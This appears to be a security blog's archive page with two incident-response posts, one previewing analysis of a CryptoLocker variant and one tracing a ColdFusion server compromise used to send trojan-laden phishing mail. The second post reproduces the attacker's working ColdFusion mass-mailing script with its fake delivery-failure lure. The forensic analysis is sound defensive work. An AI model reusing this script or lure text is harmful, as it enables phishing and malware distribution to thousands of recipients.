Monthly Archives: June 2014

Preying on Assumptions: Symmetric Encryption in a CryptoLocker Variant

CryptoLocker WarningThis trojan was found on a compromised web server that was used to send mass emails with a malicious attachment. Upon execution, the malware searches all logical drives for common media and document files, appends .CRYPTOLOCKER to each file’s name and allegedly encrypts each file with 2048-bit RSA key. It places a text file in every subdirectory with ransom instructions. It persists on the system by copying itself to a TEMP folder, and adding that copy to the system autoruns. It also gives this copy a file-association to the “.CRYPTOLOCKER” file extension. When it finishes this dirty work, it displays a warning (seen above) with instructions for downloading the Tor Browser to (presumably) cough up some money for the private RSA key required to decrypt the files. This is a similar pattern that we have seen in recent ransomware variants.

I initially executed this sample in a sandbox that had no network connectivity. Though, the malicious process never attempts to make any network connections at any point. Regardless, it still modifies files and displays the CryptoLocker alert. I immediately found this to be unusual. My understanding is that CryptoLocker initially connects to a C&C server which in turn generates a unique RSA key pair of which one is sent to a client for file encryption. This clearly isn’t the case here. I supposed that it’s possible that a public key was hard-coded into this sample, but that seems unnecessarily complicated and fragile, since we know that this was intended to be sent to many inboxes. It’s time to take a closer look at this executable.

Continue reading

ColdFusion Trojan Distribution

medium_3733339594I responded to an incident that was initiated by an abuse complaint from a European ISP. Their mail server was receiving a large amount of backscatter due to emails that were initially sent from a server that I came to inspect. The sending server was a Postfix server, and there were many undelivered emails in the queue, coming from an unfamiliar domain. After closer inspection of the queue and the Postfix logs, it was clear that the emails were originating from a web server on the local network.

The compromised web server was a Windows server running IIS and ColdFusion. The HTTP ports were publicly accessible. A brief search of the server revealed a few malicious CF files, including a large web shell, and a small mailing script. In the same directory was a newly uploaded text file, containing thousands of email addresses, and a ZIP archive containing a clearly malicious executable made to look like a text file. This piece of malware will be covered in another post.

The smaller CF mailing script contains the following code:

<cfsetting RequestTimeout ="600000">
<cfloop index="id" file="C:\inetpub\wwwroot\CFIDE\fc.txt" from="1" to="31429">
<cfset sleep(100)>
<cfset msg = RandRange(185,750)>
<cfset subj = RandRange(12,21)>
<cfmail from="Mail Delivery System <postmaster@example.com>" to="#id#" subject="Delivery Status Notification (Failure)">
<cfmailparam file="C:\inetpub\wwwroot\CFIDE\Incoming Email.zip">
Incoming email(s) for <#id#> could not be delivered due to a persistent data format error.

The incoming email(s) can be read in the attachment <Incoming Email.zip>
For security purposes it has been saved in a plain text readable binary document.

Technical overview:
>>> (after RCPT To): Status Code 550.. checking .. subject length #subj# chars, message length #msg# chars..
>>> ! Message cannot be represented in 8-Bit ASCII encoding ! Return error code 521
>>> Mail transaction failed... waiting for reply from server ..
>>> Server reply: email successfully stored in plain text binary document <Incoming Email.zip>
>>> Return failure notification with original email in attachment to recipient ..

This is an automatically generated delivery status notification, please do not reply.
</cfmail>
<cfoutput>Mail sent to #id#<br></cfoutput>
</cfloop>

This code references a text file, “fc.txt” full of thousands of email addresses, and a ZIP file, called “Incoming Email.zip”. This script creates plausible looking phishing email content, attaches the file, and then loops through the email addresses. The script uses the SMTP server associated with the server’s ColdFusion configuration.

I searched through the HTTP logs to identify how and when these malicious pages were created and accessed. Each of the pages had only been accessed a couple of times in the recent past. They were accessed from a single IP address, which, through a PTR record is self-identified as a Tor exit node. A continued search of the HTTP logs showed that the same IP had POSTed to the “/CFIDE/administrator” page before accessing these malicious files. It is possible that the site was compromised by exploiting a recent ColdFusion vulnerability identified by CVE-2013-0632. I don’t have the packet captures to confirm what exactly was POSTed to the server. However, this seems like the most likely explanation.

 Summary

  • This malware sample was distributed as an attachment to a phishing email.
  • The phishing email is designed to look like a legitimate non-delivery report.
  • The email was distributed through a short ColdFusion script that loops through a text file containing thousands of email addresses.
  • The script, email list and ZIP file were uploaded to the server by exploiting ColdFusion vulnerability CVE-2013-0632.
  • The exploit and execution of the mailing script originated from a Tor exit node, effectively anonymizing the attacker.

In the next part, I will inspect and analyze the malware payload contained within the attachment.

photo credit: Darwin Bell via photopin cc